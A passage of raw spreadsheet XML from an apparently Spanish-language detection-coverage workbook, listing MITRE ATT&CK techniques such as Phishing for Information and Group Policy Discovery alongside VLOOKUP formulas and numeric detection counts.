        <v>0</v>
      </c>
      <c r="J70" s="12">
        <v>7</v>
      </c>
      <c r="K70" s="13">
        <v>0.66666666666666663</v>
      </c>
      <c r="L70" s="394">
        <v>214</v>
      </c>
      <c r="M70" s="322">
        <v>57</v>
      </c>
      <c r="N70" s="322">
        <v>56</v>
      </c>
      <c r="O70" s="322">
        <v>0</v>
      </c>
      <c r="P70" s="12">
        <v>27</v>
      </c>
      <c r="Q70" s="13">
        <v>0.66666666666666663</v>
      </c>
      <c r="R70" s="394">
        <v>39</v>
      </c>
      <c r="S70" s="292">
        <v>281</v>
      </c>
      <c r="T70" s="322">
        <v>280</v>
      </c>
      <c r="U70" s="322">
        <v>0</v>
      </c>
      <c r="V70" s="12">
        <v>34</v>
      </c>
      <c r="W70" s="13">
        <v>0.66666666666666663</v>
      </c>
      <c r="X70" s="394">
        <v>235</v>
      </c>
      <c r="Y70" s="392">
        <v>9830</v>
      </c>
      <c r="Z70" s="392">
        <v>1182</v>
      </c>
      <c r="AA70" s="322">
        <v>0</v>
      </c>
      <c r="AB70" s="392">
        <v>66</v>
      </c>
      <c r="AC70" s="16">
        <v>1</v>
      </c>
      <c r="AD70" s="394">
        <v>480</v>
      </c>
      <c r="AE70" s="392">
        <v>427</v>
      </c>
      <c r="AF70" s="392">
        <v>352</v>
      </c>
      <c r="AG70" s="322">
        <v>0</v>
      </c>
      <c r="AH70" s="392">
        <v>48</v>
      </c>
      <c r="AI70" s="16">
        <v>1</v>
      </c>
      <c r="AJ70" s="394">
        <v>189</v>
      </c>
      <c r="AK70" s="392">
        <v>10257</v>
      </c>
      <c r="AL70" s="392">
        <v>1534</v>
      </c>
      <c r="AM70" s="322">
        <v>0</v>
      </c>
      <c r="AN70" s="392">
        <v>114</v>
      </c>
      <c r="AO70" s="16">
        <v>1</v>
      </c>
      <c r="AP70" s="394">
        <v>494</v>
      </c>
      <c r="AQ70" s="292">
        <v>0</v>
      </c>
      <c r="AR70" s="322">
        <v>0</v>
      </c>
      <c r="AS70" s="322">
        <v>0</v>
      </c>
      <c r="AT70" s="12">
        <v>0</v>
      </c>
      <c r="AU70" s="13">
        <v>0</v>
      </c>
      <c r="AV70" s="394">
        <v>0</v>
      </c>
      <c r="AW70" s="392">
        <v>67</v>
      </c>
      <c r="AX70" s="392">
        <v>66</v>
      </c>
      <c r="AY70" s="322">
        <v>0</v>
      </c>
      <c r="AZ70" s="4">
        <v>46</v>
      </c>
      <c r="BA70" s="16">
        <v>0.66666666666666663</v>
      </c>
      <c r="BB70" s="394">
        <v>41</v>
      </c>
      <c r="BC70" s="292">
        <v>348</v>
      </c>
      <c r="BD70" s="322">
        <v>346</v>
      </c>
      <c r="BE70" s="322">
        <v>0</v>
      </c>
      <c r="BF70" s="12">
        <v>80</v>
      </c>
      <c r="BG70" s="13">
        <v>0.66666666666666663</v>
      </c>
      <c r="BH70" s="394">
        <v>240</v>
      </c>
      <c r="BI70" s="292">
        <v>30</v>
      </c>
      <c r="BJ70" s="322">
        <v>26</v>
      </c>
      <c r="BK70" s="322">
        <v>0</v>
      </c>
      <c r="BL70" s="12">
        <v>9</v>
      </c>
      <c r="BM70" s="13">
        <v>0.66666666666666663</v>
      </c>
      <c r="BN70" s="394">
        <v>26</v>
      </c>
      <c r="BO70" s="292">
        <v>497</v>
      </c>
      <c r="BP70" s="322">
        <v>489</v>
      </c>
      <c r="BQ70" s="322">
        <v>0</v>
      </c>
      <c r="BR70" s="12">
        <v>9</v>
      </c>
      <c r="BS70" s="12">
        <v>11</v>
      </c>
      <c r="BT70" s="13">
        <v>1</v>
      </c>
      <c r="BU70" s="394">
        <v>467</v>
      </c>
      <c r="BV70" s="292">
        <v>12</v>
      </c>
      <c r="BW70" s="322">
        <v>11</v>
      </c>
      <c r="BX70" s="322">
        <v>0</v>
      </c>
      <c r="BY70" s="12">
        <v>2</v>
      </c>
      <c r="BZ70" s="13">
        <v>0.66666666666666663</v>
      </c>
      <c r="CA70" s="394">
        <v>11</v>
      </c>
      <c r="CB70" s="292">
        <v>4753</v>
      </c>
      <c r="CC70" s="322">
        <v>457</v>
      </c>
      <c r="CD70" s="322">
        <v>0</v>
      </c>
      <c r="CE70" s="12">
        <v>2</v>
      </c>
      <c r="CF70" s="12">
        <v>5</v>
      </c>
      <c r="CG70" s="13">
        <v>1</v>
      </c>
      <c r="CH70" s="394">
        <v>446</v>
      </c>
    </row>
    <row r="71" spans="1:98" ht="15" customHeight="1">
      <c r="A71" s="4">
        <f t="shared" si="2"/>
        <v>69</v>
      </c>
      <c r="B71" s="4" t="str">
        <f>IFERROR(VLOOKUP(A71,'Tabla 2 - Ataques detec (Imple)'!$B$3:$D$112,3,FALSE),"")</f>
        <v>T1598</v>
      </c>
      <c r="C71" s="4" t="str">
        <f>IFERROR(VLOOKUP(B71,Techniques!$B$3:$H$213,2,FALSE),"")</f>
        <v>Phishing for Information</v>
      </c>
      <c r="D71" s="4">
        <f>SUMPRODUCT(
  ('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112=$B71)*
  (LEN('Tabla 2 - Ataques detec (Imple)'!$C$3:$C$112)&gt;0)
)</f>
        <v>1</v>
      </c>
      <c r="E71" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B71,'Tabla 2 - Ataques detec (Imple)'!$E$3:$E$112)</f>
        <v>59</v>
      </c>
      <c r="F71" s="286" t="str">
        <f t="shared" si="3"/>
        <v>1 (59)</v>
      </c>
      <c r="G71" s="292">
        <v>7</v>
      </c>
      <c r="H71" s="322">
        <v>5</v>
      </c>
      <c r="I71" s="322">
        <v>0</v>
      </c>
      <c r="J71" s="12">
        <v>3</v>
      </c>
      <c r="K71" s="13">
        <v>1</v>
      </c>
      <c r="L71" s="394">
        <v>4</v>
      </c>
      <c r="M71" s="322">
        <v>9</v>
      </c>
      <c r="N71" s="322">
        <v>9</v>
      </c>
      <c r="O71" s="322">
        <v>0</v>
      </c>
      <c r="P71" s="12">
        <v>3</v>
      </c>
      <c r="Q71" s="13">
        <v>1</v>
      </c>
      <c r="R71" s="394">
        <v>5</v>
      </c>
      <c r="S71" s="292">
        <v>16</v>
      </c>
      <c r="T71" s="322">
        <v>14</v>
      </c>
      <c r="U71" s="322">
        <v>0</v>
      </c>
      <c r="V71" s="12">
        <v>6</v>
      </c>
      <c r="W71" s="13">
        <v>1</v>
      </c>
      <c r="X71" s="394">
        <v>8</v>
      </c>
      <c r="Y71" s="392">
        <v>14</v>
      </c>
      <c r="Z71" s="392">
        <v>11</v>
      </c>
      <c r="AA71" s="322">
        <v>0</v>
      </c>
      <c r="AB71" s="392">
        <v>6</v>
      </c>
      <c r="AC71" s="16">
        <v>1</v>
      </c>
      <c r="AD71" s="394">
        <v>6</v>
      </c>
      <c r="AE71" s="392">
        <v>34</v>
      </c>
      <c r="AF71" s="392">
        <v>26</v>
      </c>
      <c r="AG71" s="322">
        <v>0</v>
      </c>
      <c r="AH71" s="392">
        <v>10</v>
      </c>
      <c r="AI71" s="16">
        <v>1</v>
      </c>
      <c r="AJ71" s="394">
        <v>15</v>
      </c>
      <c r="AK71" s="392">
        <v>48</v>
      </c>
      <c r="AL71" s="392">
        <v>37</v>
      </c>
      <c r="AM71" s="322">
        <v>0</v>
      </c>
      <c r="AN71" s="392">
        <v>16</v>
      </c>
      <c r="AO71" s="16">
        <v>1</v>
      </c>
      <c r="AP71" s="394">
        <v>18</v>
      </c>
      <c r="AQ71" s="292">
        <v>0</v>
      </c>
      <c r="AR71" s="322">
        <v>0</v>
      </c>
      <c r="AS71" s="322">
        <v>0</v>
      </c>
      <c r="AT71" s="12">
        <v>0</v>
      </c>
      <c r="AU71" s="13">
        <v>0</v>
      </c>
      <c r="AV71" s="394">
        <v>0</v>
      </c>
      <c r="AW71" s="392">
        <v>2</v>
      </c>
      <c r="AX71" s="392">
        <v>1</v>
      </c>
      <c r="AY71" s="322">
        <v>0</v>
      </c>
      <c r="AZ71" s="4">
        <v>1</v>
      </c>
      <c r="BA71" s="16">
        <v>1</v>
      </c>
      <c r="BB71" s="394">
        <v>1</v>
      </c>
      <c r="BC71" s="292">
        <v>18</v>
      </c>
      <c r="BD71" s="322">
        <v>15</v>
      </c>
      <c r="BE71" s="322">
        <v>0</v>
      </c>
      <c r="BF71" s="12">
        <v>7</v>
      </c>
      <c r="BG71" s="13">
        <v>1</v>
      </c>
      <c r="BH71" s="394">
        <v>8</v>
      </c>
      <c r="BI71" s="292">
        <v>0</v>
      </c>
      <c r="BJ71" s="322">
        <v>0</v>
      </c>
      <c r="BK71" s="322">
        <v>0</v>
      </c>
      <c r="BL71" s="12">
        <v>0</v>
      </c>
      <c r="BM71" s="13">
        <v>0</v>
      </c>
      <c r="BN71" s="394">
        <v>0</v>
      </c>
      <c r="BO71" s="292">
        <v>64</v>
      </c>
      <c r="BP71" s="322">
        <v>64</v>
      </c>
      <c r="BQ71" s="322">
        <v>0</v>
      </c>
      <c r="BR71" s="12">
        <v>0</v>
      </c>
      <c r="BS71" s="12">
        <v>7</v>
      </c>
      <c r="BT71" s="13">
        <v>1</v>
      </c>
      <c r="BU71" s="394">
        <v>59</v>
      </c>
      <c r="BV71" s="292">
        <v>0</v>
      </c>
      <c r="BW71" s="322">
        <v>0</v>
      </c>
      <c r="BX71" s="322">
        <v>0</v>
      </c>
      <c r="BY71" s="12">
        <v>0</v>
      </c>
      <c r="BZ71" s="13">
        <v>0</v>
      </c>
      <c r="CA71" s="394">
        <v>0</v>
      </c>
      <c r="CB71" s="292">
        <v>5</v>
      </c>
      <c r="CC71" s="322">
        <v>4</v>
      </c>
      <c r="CD71" s="322">
        <v>0</v>
      </c>
      <c r="CE71" s="12">
        <v>0</v>
      </c>
      <c r="CF71" s="12">
        <v>1</v>
      </c>
      <c r="CG71" s="13">
        <v>1</v>
      </c>
      <c r="CH71" s="394">
        <v>4</v>
      </c>
    </row>
    <row r="72" spans="1:98" ht="15" customHeight="1">
      <c r="A72" s="4">
        <f t="shared" si="2"/>
        <v>70</v>
      </c>
      <c r="B72" s="4" t="str">
        <f>IFERROR(VLOOKUP(A72,'Tabla 2 - Ataques detec (Imple)'!$B$3:$D$112,3,FALSE),"")</f>
        <v>T1599</v>
      </c>
      <c r="C72" s="4" t="str">
        <f>IFERROR(VLOOKUP(B72,Techniques!$B$3:$H$213,2,FALSE),"")</f>
        <v>Network Boundary Bridging</v>
      </c>
      <c r="D72" s="4">
        <f>SUMPRODUCT(
  ('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112=$B72)*
  (LEN('Tabla 2 - Ataques detec (Imple)'!$C$3:$C$112)&gt;0)
)</f>
        <v>2</v>
      </c>
      <c r="E72" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B72,'Tabla 2 - Ataques detec (Imple)'!$E$3:$E$112)</f>
        <v>8</v>
      </c>
      <c r="F72" s="286" t="str">
        <f t="shared" si="3"/>
        <v>2 (8)</v>
      </c>
      <c r="G72" s="292">
        <v>12</v>
      </c>
      <c r="H72" s="322">
        <v>5</v>
      </c>
      <c r="I72" s="322">
        <v>0</v>
      </c>
      <c r="J72" s="12">
        <v>3</v>
      </c>
      <c r="K72" s="13">
        <v>1</v>
      </c>
      <c r="L72" s="394">
        <v>3</v>
      </c>
      <c r="M72" s="322">
        <v>0</v>
      </c>
      <c r="N72" s="322">
        <v>0</v>
      </c>
      <c r="O72" s="322">
        <v>0</v>
      </c>
      <c r="P72" s="12">
        <v>0</v>
      </c>
      <c r="Q72" s="13">
        <v>0</v>
      </c>
      <c r="R72" s="394">
        <v>0</v>
      </c>
      <c r="S72" s="292">
        <v>12</v>
      </c>
      <c r="T72" s="322">
        <v>5</v>
      </c>
      <c r="U72" s="322">
        <v>0</v>
      </c>
      <c r="V72" s="12">
        <v>3</v>
      </c>
      <c r="W72" s="13">
        <v>1</v>
      </c>
      <c r="X72" s="394">
        <v>3</v>
      </c>
      <c r="Y72" s="392">
        <v>16</v>
      </c>
      <c r="Z72" s="392">
        <v>8</v>
      </c>
      <c r="AA72" s="322">
        <v>0</v>
      </c>
      <c r="AB72" s="392">
        <v>4</v>
      </c>
      <c r="AC72" s="16">
        <v>1</v>
      </c>
      <c r="AD72" s="394">
        <v>3</v>
      </c>
      <c r="AE72" s="392">
        <v>17</v>
      </c>
      <c r="AF72" s="392">
        <v>14</v>
      </c>
      <c r="AG72" s="322">
        <v>0</v>
      </c>
      <c r="AH72" s="392">
        <v>5</v>
      </c>
      <c r="AI72" s="16">
        <v>1</v>
      </c>
      <c r="AJ72" s="394">
        <v>6</v>
      </c>
      <c r="AK72" s="392">
        <v>33</v>
      </c>
      <c r="AL72" s="392">
        <v>22</v>
      </c>
      <c r="AM72" s="322">
        <v>0</v>
      </c>
      <c r="AN72" s="392">
        <v>9</v>
      </c>
      <c r="AO72" s="16">
        <v>1</v>
      </c>
      <c r="AP72" s="394">
        <v>6</v>
      </c>
      <c r="AQ72" s="292">
        <v>0</v>
      </c>
      <c r="AR72" s="322">
        <v>0</v>
      </c>
      <c r="AS72" s="322">
        <v>0</v>
      </c>
      <c r="AT72" s="12">
        <v>0</v>
      </c>
      <c r="AU72" s="13">
        <v>0</v>
      </c>
      <c r="AV72" s="394">
        <v>0</v>
      </c>
      <c r="AW72" s="392">
        <v>4</v>
      </c>
      <c r="AX72" s="392">
        <v>3</v>
      </c>
      <c r="AY72" s="322">
        <v>0</v>
      </c>
      <c r="AZ72" s="4">
        <v>1</v>
      </c>
      <c r="BA72" s="16">
        <v>1</v>
      </c>
      <c r="BB72" s="394">
        <v>3</v>
      </c>
      <c r="BC72" s="292">
        <v>16</v>
      </c>
      <c r="BD72" s="322">
        <v>8</v>
      </c>
      <c r="BE72" s="322">
        <v>0</v>
      </c>
      <c r="BF72" s="12">
        <v>4</v>
      </c>
      <c r="BG72" s="13">
        <v>1</v>
      </c>
      <c r="BH72" s="394">
        <v>3</v>
      </c>
      <c r="BI72" s="292">
        <v>2</v>
      </c>
      <c r="BJ72" s="322">
        <v>2</v>
      </c>
      <c r="BK72" s="322">
        <v>0</v>
      </c>
      <c r="BL72" s="12">
        <v>1</v>
      </c>
      <c r="BM72" s="13">
        <v>0.66666666666666663</v>
      </c>
      <c r="BN72" s="394">
        <v>2</v>
      </c>
      <c r="BO72" s="292">
        <v>11</v>
      </c>
      <c r="BP72" s="322">
        <v>11</v>
      </c>
      <c r="BQ72" s="322">
        <v>0</v>
      </c>
      <c r="BR72" s="12">
        <v>1</v>
      </c>
      <c r="BS72" s="12">
        <v>3</v>
      </c>
      <c r="BT72" s="13">
        <v>0.66666666666666663</v>
      </c>
      <c r="BU72" s="394">
        <v>6</v>
      </c>
      <c r="BV72" s="292">
        <v>0</v>
      </c>
      <c r="BW72" s="322">
        <v>0</v>
      </c>
      <c r="BX72" s="322">
        <v>0</v>
      </c>
      <c r="BY72" s="12">
        <v>0</v>
      </c>
      <c r="BZ72" s="13">
        <v>0</v>
      </c>
      <c r="CA72" s="394">
        <v>0</v>
      </c>
      <c r="CB72" s="292">
        <v>3</v>
      </c>
      <c r="CC72" s="322">
        <v>3</v>
      </c>
      <c r="CD72" s="322">
        <v>0</v>
      </c>
      <c r="CE72" s="12">
        <v>0</v>
      </c>
      <c r="CF72" s="12">
        <v>1</v>
      </c>
      <c r="CG72" s="13">
        <v>1</v>
      </c>
      <c r="CH72" s="394">
        <v>3</v>
      </c>
    </row>
    <row r="73" spans="1:98" ht="15" customHeight="1">
      <c r="A73" s="4">
        <f t="shared" si="2"/>
        <v>71</v>
      </c>
      <c r="B73" s="4" t="str">
        <f>IFERROR(VLOOKUP(A73,'Tabla 2 - Ataques detec (Imple)'!$B$3:$D$112,3,FALSE),"")</f>
        <v>T1602</v>
      </c>
      <c r="C73" s="4" t="str">
        <f>IFERROR(VLOOKUP(B73,Techniques!$B$3:$H$213,2,FALSE),"")</f>
        <v>Data from Configuration Repository</v>
      </c>
      <c r="D73" s="4">
        <f>SUMPRODUCT(
  ('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112=$B73)*
  (LEN('Tabla 2 - Ataques detec (Imple)'!$C$3:$C$112)&gt;0)
)</f>
        <v>1</v>
      </c>
      <c r="E73" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B73,'Tabla 2 - Ataques detec (Imple)'!$E$3:$E$112)</f>
        <v>2</v>
      </c>
      <c r="F73" s="286" t="str">
        <f t="shared" si="3"/>
        <v>1 (2)</v>
      </c>
      <c r="G73" s="292">
        <v>0</v>
      </c>
      <c r="H73" s="322">
        <v>0</v>
      </c>
      <c r="I73" s="322">
        <v>0</v>
      </c>
      <c r="J73" s="12">
        <v>0</v>
      </c>
      <c r="K73" s="13">
        <v>0</v>
      </c>
      <c r="L73" s="394">
        <v>0</v>
      </c>
      <c r="M73" s="322">
        <v>396</v>
      </c>
      <c r="N73" s="322">
        <v>1</v>
      </c>
      <c r="O73" s="322">
        <v>0</v>
      </c>
      <c r="P73" s="12">
        <v>1</v>
      </c>
      <c r="Q73" s="13">
        <v>1</v>
      </c>
      <c r="R73" s="394">
        <v>1</v>
      </c>
      <c r="S73" s="292">
        <v>396</v>
      </c>
      <c r="T73" s="322">
        <v>1</v>
      </c>
      <c r="U73" s="322">
        <v>0</v>
      </c>
      <c r="V73" s="12">
        <v>1</v>
      </c>
      <c r="W73" s="13">
        <v>1</v>
      </c>
      <c r="X73" s="394">
        <v>1</v>
      </c>
      <c r="Y73" s="392">
        <v>792</v>
      </c>
      <c r="Z73" s="392">
        <v>2</v>
      </c>
      <c r="AA73" s="322">
        <v>0</v>
      </c>
      <c r="AB73" s="392">
        <v>2</v>
      </c>
      <c r="AC73" s="16">
        <v>1</v>
      </c>
      <c r="AD73" s="394">
        <v>1</v>
      </c>
      <c r="AE73" s="392">
        <v>796</v>
      </c>
      <c r="AF73" s="392">
        <v>4</v>
      </c>
      <c r="AG73" s="322">
        <v>0</v>
      </c>
      <c r="AH73" s="392">
        <v>4</v>
      </c>
      <c r="AI73" s="16">
        <v>1</v>
      </c>
      <c r="AJ73" s="394">
        <v>1</v>
      </c>
      <c r="AK73" s="392">
        <v>1588</v>
      </c>
      <c r="AL73" s="392">
        <v>6</v>
      </c>
      <c r="AM73" s="322">
        <v>0</v>
      </c>
      <c r="AN73" s="392">
        <v>6</v>
      </c>
      <c r="AO73" s="16">
        <v>1</v>
      </c>
      <c r="AP73" s="394">
        <v>1</v>
      </c>
      <c r="AQ73" s="292">
        <v>0</v>
      </c>
      <c r="AR73" s="322">
        <v>0</v>
      </c>
      <c r="AS73" s="322">
        <v>0</v>
      </c>
      <c r="AT73" s="12">
        <v>0</v>
      </c>
      <c r="AU73" s="13">
        <v>0</v>
      </c>
      <c r="AV73" s="394">
        <v>0</v>
      </c>
      <c r="AW73" s="392">
        <v>792</v>
      </c>
      <c r="AX73" s="392">
        <v>2</v>
      </c>
      <c r="AY73" s="322">
        <v>0</v>
      </c>
      <c r="AZ73" s="4">
        <v>2</v>
      </c>
      <c r="BA73" s="16">
        <v>1</v>
      </c>
      <c r="BB73" s="394">
        <v>1</v>
      </c>
      <c r="BC73" s="292">
        <v>1188</v>
      </c>
      <c r="BD73" s="322">
        <v>3</v>
      </c>
      <c r="BE73" s="322">
        <v>0</v>
      </c>
      <c r="BF73" s="12">
        <v>3</v>
      </c>
      <c r="BG73" s="13">
        <v>1</v>
      </c>
      <c r="BH73" s="394">
        <v>1</v>
      </c>
      <c r="BI73" s="292">
        <v>0</v>
      </c>
      <c r="BJ73" s="322">
        <v>0</v>
      </c>
      <c r="BK73" s="322">
        <v>0</v>
      </c>
      <c r="BL73" s="12">
        <v>0</v>
      </c>
      <c r="BM73" s="13">
        <v>0</v>
      </c>
      <c r="BN73" s="394">
        <v>0</v>
      </c>
      <c r="BO73" s="292">
        <v>3</v>
      </c>
      <c r="BP73" s="322">
        <v>3</v>
      </c>
      <c r="BQ73" s="322">
        <v>0</v>
      </c>
      <c r="BR73" s="12">
        <v>0</v>
      </c>
      <c r="BS73" s="12">
        <v>3</v>
      </c>
      <c r="BT73" s="13">
        <v>1</v>
      </c>
      <c r="BU73" s="394">
        <v>1</v>
      </c>
      <c r="BV73" s="292">
        <v>0</v>
      </c>
      <c r="BW73" s="322">
        <v>0</v>
      </c>
      <c r="BX73" s="322">
        <v>0</v>
      </c>
      <c r="BY73" s="12">
        <v>0</v>
      </c>
      <c r="BZ73" s="13">
        <v>0</v>
      </c>
      <c r="CA73" s="394">
        <v>0</v>
      </c>
      <c r="CB73" s="292">
        <v>1</v>
      </c>
      <c r="CC73" s="322">
        <v>1</v>
      </c>
      <c r="CD73" s="322">
        <v>0</v>
      </c>
      <c r="CE73" s="12">
        <v>0</v>
      </c>
      <c r="CF73" s="12">
        <v>1</v>
      </c>
      <c r="CG73" s="13">
        <v>1</v>
      </c>
      <c r="CH73" s="394">
        <v>1</v>
      </c>
    </row>
    <row r="74" spans="1:98" ht="15" customHeight="1">
      <c r="A74" s="4">
        <f t="shared" si="2"/>
        <v>72</v>
      </c>
      <c r="B74" s="4" t="str">
        <f>IFERROR(VLOOKUP(A74,'Tabla 2 - Ataques detec (Imple)'!$B$3:$D$112,3,FALSE),"")</f>
        <v>T1612</v>
      </c>
      <c r="C74" s="4" t="str">
        <f>IFERROR(VLOOKUP(B74,Techniques!$B$3:$H$213,2,FALSE),"")</f>
        <v>Build Image on Host</v>
      </c>
      <c r="D74" s="4">
        <f>SUMPRODUCT(
  ('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112=$B74)*
  (LEN('Tabla 2 - Ataques detec (Imple)'!$C$3:$C$112)&gt;0)
)</f>
        <v>2</v>
      </c>
      <c r="E74" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B74,'Tabla 2 - Ataques detec (Imple)'!$E$3:$E$112)</f>
        <v>188</v>
      </c>
      <c r="F74" s="286" t="str">
        <f t="shared" si="3"/>
        <v>2 (188)</v>
      </c>
      <c r="G74" s="292">
        <v>114</v>
      </c>
      <c r="H74" s="322">
        <v>65</v>
      </c>
      <c r="I74" s="322">
        <v>0</v>
      </c>
      <c r="J74" s="12">
        <v>6</v>
      </c>
      <c r="K74" s="13">
        <v>1</v>
      </c>
      <c r="L74" s="394">
        <v>23</v>
      </c>
      <c r="M74" s="322">
        <v>159</v>
      </c>
      <c r="N74" s="322">
        <v>12</v>
      </c>
      <c r="O74" s="322">
        <v>0</v>
      </c>
      <c r="P74" s="12">
        <v>3</v>
      </c>
      <c r="Q74" s="13">
        <v>1</v>
      </c>
      <c r="R74" s="394">
        <v>12</v>
      </c>
      <c r="S74" s="292">
        <v>273</v>
      </c>
      <c r="T74" s="322">
        <v>77</v>
      </c>
      <c r="U74" s="322">
        <v>0</v>
      </c>
      <c r="V74" s="12">
        <v>9</v>
      </c>
      <c r="W74" s="13">
        <v>1</v>
      </c>
      <c r="X74" s="394">
        <v>34</v>
      </c>
      <c r="Y74" s="392">
        <v>127</v>
      </c>
      <c r="Z74" s="392">
        <v>78</v>
      </c>
      <c r="AA74" s="322">
        <v>0</v>
      </c>
      <c r="AB74" s="392">
        <v>10</v>
      </c>
      <c r="AC74" s="16">
        <v>1</v>
      </c>
      <c r="AD74" s="394">
        <v>35</v>
      </c>
      <c r="AE74" s="392">
        <v>309</v>
      </c>
      <c r="AF74" s="392">
        <v>97</v>
      </c>
      <c r="AG74" s="322">
        <v>0</v>
      </c>
      <c r="AH74" s="392">
        <v>10</v>
      </c>
      <c r="AI74" s="16">
        <v>1</v>
      </c>
      <c r="AJ74" s="394">
        <v>83</v>
      </c>
      <c r="AK74" s="392">
        <v>436</v>
      </c>
      <c r="AL74" s="392">
        <v>175</v>
      </c>
      <c r="AM74" s="322">
        <v>0</v>
      </c>
      <c r="AN74" s="392">
        <v>20</v>
      </c>
      <c r="AO74" s="16">
        <v>1</v>
      </c>
      <c r="AP74" s="394">
        <v>109</v>
      </c>
      <c r="AQ74" s="292">
        <v>0</v>
      </c>
      <c r="AR74" s="322">
        <v>0</v>
      </c>
      <c r="AS74" s="322">
        <v>0</v>
      </c>
      <c r="AT74" s="12">
        <v>0</v>
      </c>
      <c r="AU74" s="13">
        <v>0</v>
      </c>
      <c r="AV74" s="394">
        <v>0</v>
      </c>
      <c r="AW74" s="392">
        <v>4</v>
      </c>
      <c r="AX74" s="392">
        <v>4</v>
      </c>
      <c r="AY74" s="322">
        <v>0</v>
      </c>
      <c r="AZ74" s="4">
        <v>2</v>
      </c>
      <c r="BA74" s="16">
        <v>1</v>
      </c>
      <c r="BB74" s="394">
        <v>4</v>
      </c>
      <c r="BC74" s="292">
        <v>277</v>
      </c>
      <c r="BD74" s="322">
        <v>81</v>
      </c>
      <c r="BE74" s="322">
        <v>0</v>
      </c>
      <c r="BF74" s="12">
        <v>11</v>
      </c>
      <c r="BG74" s="13">
        <v>1</v>
      </c>
      <c r="BH74" s="394">
        <v>37</v>
      </c>
      <c r="BI74" s="292">
        <v>49</v>
      </c>
      <c r="BJ74" s="322">
        <v>33</v>
      </c>
      <c r="BK74" s="322">
        <v>0</v>
      </c>
      <c r="BL74" s="12">
        <v>3</v>
      </c>
      <c r="BM74" s="13">
        <v>1</v>
      </c>
      <c r="BN74" s="394">
        <v>30</v>
      </c>
      <c r="BO74" s="292">
        <v>192</v>
      </c>
      <c r="BP74" s="322">
        <v>176</v>
      </c>
      <c r="BQ74" s="322">
        <v>0</v>
      </c>
      <c r="BR74" s="12">
        <v>3</v>
      </c>
      <c r="BS74" s="12">
        <v>7</v>
      </c>
      <c r="BT74" s="13">
        <v>1</v>
      </c>
      <c r="BU74" s="394">
        <v>153</v>
      </c>
      <c r="BV74" s="292">
        <v>4</v>
      </c>
      <c r="BW74" s="322">
        <v>4</v>
      </c>
      <c r="BX74" s="322">
        <v>0</v>
      </c>
      <c r="BY74" s="12">
        <v>4</v>
      </c>
      <c r="BZ74" s="13">
        <v>0.5</v>
      </c>
      <c r="CA74" s="394">
        <v>2</v>
      </c>
      <c r="CB74" s="292">
        <v>7</v>
      </c>
      <c r="CC74" s="322">
        <v>6</v>
      </c>
      <c r="CD74" s="322">
        <v>0</v>
      </c>
      <c r="CE74" s="12">
        <v>4</v>
      </c>
      <c r="CF74" s="12">
        <v>2</v>
      </c>
      <c r="CG74" s="13">
        <v>0.5</v>
      </c>
      <c r="CH74" s="394">
        <v>3</v>
      </c>
    </row>
    <row r="75" spans="1:98" ht="15" customHeight="1">
      <c r="A75" s="4">
        <f t="shared" si="2"/>
        <v>73</v>
      </c>
      <c r="B75" s="4" t="str">
        <f>IFERROR(VLOOKUP(A75,'Tabla 2 - Ataques detec (Imple)'!$B$3:$D$112,3,FALSE),"")</f>
        <v>T1615</v>
      </c>
      <c r="C75" s="4" t="str">
        <f>IFERROR(VLOOKUP(B75,Techniques!$B$3:$H$213,2,FALSE),"")</f>
        <v>Group Policy Discovery</v>
      </c>
      <c r="D75" s="4">
        <f>SUMPRODUCT(
  ('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112=$B75)*
  (LEN('Tabla 2 - Ataques detec (Imple)'!$C$3:$C$112)&gt;0)
)</f>
        <v>1</v>
      </c>
      <c r="E75" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B75,'Tabla 2 - Ataques detec (Imple)'!$E$3:$E$112)</f>
        <v>53</v>
      </c>
      <c r="F75" s="286" t="str">
        <f t="shared" si="3"/>
        <v>1 (53)</v>
      </c>
      <c r="G75" s="292">
        <v>39</v>
      </c>
      <c r="H75" s="322">
        <v>39</v>
      </c>
      <c r="I75" s="322">
        <v>0</v>
      </c>
      <c r="J75" s="12">
        <v>1</v>
      </c>
      <c r="K75" s="13">
        <v>1</v>
      </c>
      <c r="L75" s="394">
        <v>39</v>
      </c>
      <c r="M75" s="322">
        <v>0</v>
      </c>
      <c r="N75" s="322">
        <v>0</v>
      </c>
      <c r="O75" s="322">
        <v>0</v>
      </c>
      <c r="P75" s="12">
        <v>0</v>
      </c>
      <c r="Q75" s="13">
        <v>0</v>
      </c>
      <c r="R75" s="394">
        <v>0</v>
      </c>
      <c r="S75" s="292">
        <v>39</v>
      </c>
      <c r="T75" s="322">
        <v>39</v>
      </c>
      <c r="U75" s="322">
        <v>0</v>
      </c>
      <c r="V75" s="12">
        <v>1</v>
      </c>
      <c r="W75" s="13">
        <v>1</v>
      </c>
      <c r="X75" s="394">
        <v>39</v>
      </c>
      <c r="Y75" s="392">
        <v>39</v>
      </c>
      <c r="Z75" s="392">
        <v>39</v>
      </c>
      <c r="AA75" s="322">
        <v>0</v>
      </c>
      <c r="AB75" s="392">
        <v>1</v>
      </c>
      <c r="AC75" s="16">
        <v>1</v>
      </c>
      <c r="AD75" s="394">
        <v>39</v>
      </c>
      <c r="AE75" s="392">
        <v>10</v>
      </c>
      <c r="AF75" s="392">
        <v>10</v>
      </c>
      <c r="AG75" s="322">
        <v>0</v>
      </c>
      <c r="AH75" s="392">
        <v>2</v>
      </c>
      <c r="AI75" s="16">
        <v>1</v>
      </c>
      <c r="AJ75" s="394">
        <v>5</v>
      </c>
      <c r="AK75" s="392">
        <v>49</v>
      </c>
      <c r="AL75" s="392">
        <v>49</v>
      </c>
      <c r="AM75" s="322">
        <v>0</v>
      </c>
      <c r="AN75" s="392">
        <v>3</v>
      </c>
      <c r="AO75" s="16">
        <v>1</v>
      </c>
      <c r="AP75" s="394">
        <v>43</v>
      </c>
      <c r="AQ75" s="292">
        <v>0</v>
      </c>
      <c r="AR75" s="322">
        <v>0</v>
      </c>
      <c r="AS75" s="322">
        <v>0</v>
      </c>
      <c r="AT75" s="12">
        <v>0</v>
